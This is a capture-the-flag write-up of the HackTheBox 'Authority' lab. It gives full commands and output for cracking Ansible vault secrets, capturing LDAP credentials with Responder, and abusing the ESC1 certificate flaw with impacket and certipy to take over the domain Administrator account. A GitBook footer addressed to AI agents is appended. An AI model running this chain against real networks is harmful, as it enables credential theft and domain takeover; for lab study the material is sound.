> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-authority.md).

# HTB - Authority

## NMAP

```bash
nmap -p 53,80,88,135,139,389,445,595,636,3268,3269,5985,8443,9389,47001,49664-49667,49673,49688,49689,49691,49692,49700,49706,49710,49730 -sCV 10.10.11.222                             
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-23 15:13 EST 
Nmap scan report for 10.10.11.222
Host is up (0.10s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
80/tcp    open   http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-24 00:13:17Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-11-24T00:14:24+00:00; +4h00m08s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername:<unsupported>, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
445/tcp   open   microsoft-ds?
595/tcp   closed cab-protocol
636/tcp   open   ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-11-24T00:14:23+00:00; +4h00m07s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername:<unsupported>, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-11-24T00:14:24+00:00; +4h00m08s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername:<unsupported>, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3269/tcp  open   ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername:<unsupported>, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-11-24T00:14:23+00:00; +4h00m07s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp  open   ssl/https-alt
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-11-08T04:11:41
|_Not valid after:  2025-11-09T15:50:05
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=ISO-8859-1
|     Content-Length: 82
|     Date: Fri, 24 Nov 2023 00:13:24 GMT
|     Connection: close
|     <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET, HEAD, POST, OPTIONS
|     Content-Length: 0
|     Date: Fri, 24 Nov 2023 00:13:24 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1936
|     Date: Fri, 24 Nov 2023 00:13:30 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
```

### SMB

Can Enumerate Shares through guest access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fa3PtLrLafVGnf56aMa9X%2Fimage.png?alt=media&amp;token=1cbd0ce2-a04e-46ca-b598-1034f0df00be" alt=""><figcaption></figcaption></figure>

Next we can use smbclient to enumerate the shares properly.

```bash
┌──(ajay㉿kali)-[~]
└─$ smbclient //10.129.229.56/Development -U 'guest' -p ''
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> dir

\Automation\Ansible
  .                                   D        0  Fri Mar 17 09:20:50 2023
  ..                                  D        0  Fri Mar 17 09:20:50 2023
  ADCS                                D        0  Fri Mar 17 09:20:48 2023
  LDAP                                D        0  Fri Mar 17 09:20:48 2023
  PWM                                 D        0  Fri Mar 17 09:20:48 2023
  SHARE                               D        0  Fri Mar 17 09:20:48 2023

                      D        0  Fri Mar 17 09:20:48 2023

\Automation\Ansible\PWM
  .                                   D        0  Fri Mar 17 09:20:48 2023
  ..                                  D        0  Fri Mar 17 09:20:48 2023
  ansible.cfg                         A      491  Thu Sep 22 01:36:58 2022
  ansible_inventory                   A      174  Wed Sep 21 18:19:32 2022
  defaults                            D        0  Fri Mar 17 09:20:48 2023
  handlers                            D        0  Fri Mar 17 09:20:48 2023
  meta                                D        0  Fri Mar 17 09:20:48 2023
  README.md                           A     1290  Thu Sep 22 01:35:58 2022
  tasks                               D        0  Fri Mar 17 09:20:48 2023
  templates                           D        0  Fri Mar 17 09:20:48 2023
                       A     2146  Tue Sep  6 12:07:26 2022

\Automation\Ansible\LDAP\.bin
  .                                   D        0  Fri Mar 17 09:20:48 2023
  ..                                  D        0  Fri Mar 17 09:20:48 2023
  clean_vault                         A      677  Tue Dec 25 23:05:44 2018
  diff_vault                          A      357  Tue Dec 25 23:05:44 2018
  smudge_vault                        A      768  Tue Dec 25 23:05:44 2018
                       A     5235  Tue Dec 25 23:05:44 2018

\Automation\Ansible\LDAP\templates
  .                                   D        0  Fri Mar 17 09:20:48 2023
  ..                                  D        0  Fri Mar 17 09:20:48 2023
  ldap_sudo_groups.j2                 A      131  Tue Dec 25 23:05:44 2018
  ldap_sudo_users.j2                  A      106  Tue Dec 25 23:05:44 2018
  sssd.conf.j2                        A     2556  Tue Dec 25 23:05:44 2018
  sudo_group.j2                       A       30  Tue Dec 25 23:05:44 2018

                       A     1832  Wed Sep 21 22:41:48 2022

\Automation\Ansible\PWM\templates
  .                                   D        0  Fri Mar 17 09:20:48 2023
  ..                                  D        0  Fri Mar 17 09:20:48 2023
  context.xml.j2                      A      422  Wed May 18 15:57:54 2022
  tomcat-users.xml.j2                 A      388  Wed Sep 21 18:08:08 2022

```

Downlaoding the files to host machine and checking them leaks the following info.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmS4gRsoU2Oc3hwDJhSCz%2Fimage.png?alt=media&amp;token=b1da4f03-2c3f-49dc-ab3f-15c75b3f619a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1lXJy5vIBIKHbszUNbrJ%2Fimage.png?alt=media&amp;token=6ef7b563-18a7-440a-b2ba-28aa70d39fd5" alt=""><figcaption></figcaption></figure>

```bash

smb: \Automation\Ansible\PWM\defaults\> mget main.yml
Get file main.yml? y
getting file \Automation\Ansible\PWM\defaults\main.yml of size 1591 as main.yml (1.6 KiloBytes/sec) (average 1.7 KiloBytes/sec)

┌──(ajay㉿kali)-[~]
└─$ cat main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764    
```

The main.yml file has pwm vault hashes which can be cracked and ecrypted.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpqRrZsizDzvDbn3XniV0%2Fimage.png?alt=media&amp;token=c7e1867b-cd26-49d3-89f4-2e3f97dff05e" alt=""><figcaption></figcaption></figure>

```bash
──(ajay㉿kali)-[~]
└─$ ansible2john vault_admin_login.txt > john_admin_login.hash
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ ansible2john vault_admin_password.txt > john_admin_password.hash
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ ansible2john vault_ldap_password.txt > john_ldap_password.hash


┌──(ajay㉿kali)-[~]
└─$ john john_admin_login.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (vault_admin_login.txt)     
1g 0:00:00:05 DONE (2026-05-30 16:40) 0.1855g/s 7385p/s 7385c/s 7385C/s 112500..victor2
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

└─$ john john_ldap_password.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (vault_ldap_password.txt)     
1g 0:00:00:04 DONE (2026-05-30 16:41) 0.2012g/s 8009p/s 8009c/s 8009C/s 112500..victor2
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

```

All three of them use the same vault so cracking one of them gives the password.

#### Decrypting Ansible vault

```bash
──(ajay㉿kali)-[~]
└─$ ansible-vault decrypt vault_admin_login.txt --vault-password-file <(echo '!@#$%^&*')
Decryption successful
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ ansible-vault decrypt vault_admin_password.txt --vault-password-file <(echo '!@#$%^&*')
Decryption successful
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ ansible-vault decrypt vault_ldap_password.txt --vault-password-file <(echo '!@#$%^&*')
Decryption successful

```

```bash
┌──(ajay㉿kali)-[~]
└─$ cat vault_admin_login.txt           
svc_pwm                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ cat vault_admin_password.txt
pWm_@dm!N_!23                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ cat vault_ldap_password.txt 
DevT3st@123                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]// Some code
```

### HTTPS - 8443

Browsing to the port gives a login page too the pwm.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiWsjXNskm9SINY55LsFH%2Fimage.png?alt=media&amp;token=7819ba4c-86c9-4b59-8dd5-3496453e58f6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZNLl5JaixllopdgvwF4o%2Fimage.png?alt=media&amp;token=8affaec9-8a5e-4993-a522-84a1ad3536ce" alt=""><figcaption></figcaption></figure>

logging in through the credentials give error.

* PWM is trying to bind to LDAP as `CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb`
* It's failing because of a certificate issue with `ldaps://authority.authority.htb:636`

### PWM To Shell

Since PWM will try to authenticate to whatever LDAP URI you configure, you can hijack it:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnLKyl9VAJBRZytS3RDuk%2Fimage.png?alt=media&amp;token=0044aec6-56ec-4f4f-897c-30df880760b2" alt=""><figcaption></figcaption></figure>

I can edit the configuration manager through the configuration editor.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbJoW1NAhx0bIs1gnHMEW%2Fimage.png?alt=media&amp;token=8e0a4bfc-e49d-4ba9-a12c-3823720b439f" alt=""><figcaption></figcaption></figure>

First Run responder on the attacker machine and then edit configuration by adding your ip as value and click test ldap profile to get a connection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FeJsf6cBYWlvBuBtJ8LvL%2Fimage.png?alt=media&amp;token=56e7c260-e0b6-4051-8d8c-1ebad0f687a3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDju4YGBtMZv4tfMdTnZW%2Fimage.png?alt=media&amp;token=8894de2f-a3fa-4020-bda2-14615fb248a9" alt=""><figcaption></figcaption></figure>

## Shell as SVC\_LDAP

Using the creds i got access through winrm.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfrGlamuok1i5QQYNYq7P%2Fimage.png?alt=media&amp;token=aea0dba1-b4ec-4d37-98d8-96ca0d4f297b" alt=""><figcaption></figcaption></figure>

### Bloodhound

Next to get clear picture of permissions and domain i have collected the bloodhound loot.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbJH0smYThe0KFovDR9rj%2Fimage.png?alt=media&amp;token=7611417f-a9b4-47e9-a8f8-79261586b3d8" alt=""><figcaption></figcaption></figure>

No interesting permissions for svc\_ldap. when looked for shortest paths to admin found below and also saw a ADCS folder in the share to.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsfcPjcNiTuT4ebJXzEuU%2Fimage.png?alt=media&amp;token=3d927580-72ef-4caa-bd96-9b458df9eb45" alt=""><figcaption></figcaption></figure>

This means there can be a chance to find vulnerable certificate templates.

## Enumerating Certificate Templates

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.129.229.56 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 21 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'AUTHORITY-CA'
[*] Checking web enrollment for CA 'AUTHORITY-CA' @ 'authority.authority.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-03-24T23:48:09+00:00
    Template Last Modified              : 2023-03-24T23:48:11+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Full Control Principals         : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Property Enroll           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
    [+] User Enrollable Principals      : AUTHORITY.HTB\Domain Computers
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
```

ound a Vulnerability ESC1.\
ESC1 confirmed on the CorpVPN template!

### Exploiting ESC1

The CorpVPN template has enrollment rights only for Domain Computers (machine accounts), not regular users. svc\_ldap is a user account, so it can't enroll in this template directly.

Since svc\_ldap is a user (not a computer), we need a machine account first.

```bash
#Step 1: Create a machine account (using svc_ldap)
┌──(ajay㉿kali)-[~]
└─$ impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' -dc-ip 10.129.229.56 -computer-name 'EVILPC$' -computer-pass 'EvilPass123!'
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account EVILPC$ with password EvilPass123!.


#Step 2: Request cert as Administrator via ESC1
┌──(ajay㉿kali)-[~]
└─$ certipy req -u 'EVILPC$@authority.htb' -p 'EvilPass123!' -dc-ip 10.129.229.56 -ca 'AUTHORITY-CA' -template 'CorpVPN' -upn 'administrator@authority.htb' -target authority.htb
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDpWk4aV35r9lcyM4XnRK%2Fimage.png?alt=media&amp;token=f66be70f-d32e-4a03-b66b-6fe35b03623a" alt=""><figcaption></figcaption></figure>

authenticating gave a kerberos error so instead we can use ldap schannel.

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy auth -pfx administrator.pfx -dc-ip 10.129.229.56 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@authority.htb'
[*] Connecting to 'ldaps://10.129.229.56:636'
[*] Authenticated to '10.129.229.56' as: 'u:HTB\\Administrator'
Type help for list of commands

# change_password Administrator 'Passsword@123'
Got User DN: CN=Administrator,CN=Users,DC=authority,DC=htb
Attempting to set new password of: Passsword@123
Password changed successfully!
```

Next login using the credentials to get the shell.

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQvSszOsYr3cnPDWr5xJv%2Fimage.png?alt=media&amp;token=901b15df-f261-4ba4-8607-d0a3c861be44" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwEh51WlL1ysSec5RmFrw%2Fimage.png?alt=media&amp;token=ae6863cd-b56b-4fb7-a650-421d44433698" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-authority.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
